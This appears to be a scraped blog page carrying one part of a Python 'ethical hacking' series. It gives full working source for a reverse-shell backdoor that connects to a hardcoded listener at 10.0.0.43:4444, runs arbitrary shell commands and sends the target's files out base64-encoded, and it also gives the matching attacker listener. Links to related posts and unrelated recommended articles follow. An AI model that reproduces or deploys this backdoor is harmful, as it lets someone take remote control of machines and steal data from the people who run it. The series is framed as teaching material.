File Download:

  • A file is a series of characters.
  • Therefore to transfer a file we need to:
    • 1. Read the file as a sequence of characters.
    • 2. Send this sequence of characters.
    • 3. Create a new empty file at the destination.
    • 4. Store the transferred sequence of characters in the new file.

Server Side - Listener code:

#!/usr/bin/env python

import socket

import json

import base64

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command)

        if command[0] == "exit":

            self.connection.close()

            exit()

        return self.reliable_receive()

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Download successful."

    def run(self):

        while True:

            command = input(">> ")

            command = command.split(" ")

            result = self.execute_remotely(command)

            if command[0] == "download":

                result = self.write_file(command[1], result)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def run(self):

        while True:

            command = self.reliable_receive()

            if command[0] == "exit":

                self.connection.close()

                exit()

            elif command[0] == "cd" and len(command) > 1:

                command_result = self.change_working_directory_to(command[1])

            elif command[0] == "download":

                command_result = self.read_file(command[1]).decode()

            else:

                command_result = self.execute_system_command(command).decode()

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Download the files from the target computer successfully.

Python Ethical Hacking - BACKDOORS(5)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  5. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Ubuntu16.06常见服务搭建

    摘要 系统环境Ubuntu 16.04 amd64 隔一段时间要配一次服务记不住,记录在这里方便以后安装. 目前更新了以下服务: ssh samba vimrc // 20200126更新 ssh 安 ...

  2. MySQL 视图 事务 索引 外连接

    视图 1.定义 select 语句的结果集,是一张虚拟的表2.创建视图语句create view 视图名 as select语句3.查看视图show views;4.使用视图select * from ...

  3. JSON类库Jackson优雅序列化Java枚举类

    1. 前言 在Java开发中我们为了避免过多的魔法值,使用枚举类来封装一些静态的状态代码.但是在将这些枚举的意思正确而全面的返回给前端却并不是那么顺利,我们通常会使用Jackson类库序列化对象为JS ...

  4. 容器中的Java堆大小调整:快速,轻松

    在上一篇博客中,我们已经看到Java进行了改进,可以根据正在运行的环境(即物理机或容器(码头工人))识别内存.java的最初问题是,它无法弄清楚它是否在容器中运行,并且它曾经为容器运行所在的整个硬件捕 ...

  5. 向强大的SVG迈进

    作者:凹凸曼 - 暖暖 SVG 即 Scalable Vector Graphics 可缩放矢量图形,使用XML格式定义图形. 一.SVG印象 SVG 的应用十分广泛,得益于 SVG 强大的各种特性. ...

  6. weblogic高级进阶之ssl配置证书

    1.首先需要明白ssl的原理 这里我们使用keytool的方式为AdminServer配置ssl证书 配置证书的方式如下所示: C:\Users\Administrator\Desktop\mykey ...

  7. Day12-微信小程序实战-交友小程序-优化“附近的人”页面与serach组件的布局和样式以及搜索历史记录和本地缓存*内附代码)

    回顾/:我们已经实现了显示附近的人的功能了,可以多个人看到附近的人页面了 但是还是要进行优化有几个问题:1.我们用户选择了其他的自定义头像之后,在首页可以看到头像的变化,但是在附近的人中头像会变成报错 ...

  8. 搭建hadoop伪集群

    基础设置:jdk.ssh. 1.操作系统.环境.网络.必须软件 2.关闭防火墙 3.设置hosts映射 4.时间同步 5.安装jdk 6.设置ssh免秘钥部署配置:初始化运行:命令行使用:

  9. java后端无法接收到前端传递的json对象

    java后端无法接收到前端传递的json对象 一·可能是因为未使用@RequestBody 在Controller层中,要么使用@RestController要么使用@Controller+@@Req ...

  10. 策略模式、策略模式与Spring的碰撞

    策略模式是GoF23种设计模式中比较简单的了,也是常用的设计模式之一,今天我们就来看看策略模式. 实际案例 我工作第三年的时候,重构旅游路线的机票查询模块,旅游路线分为四种情况: 如果A地-B地往返都 ...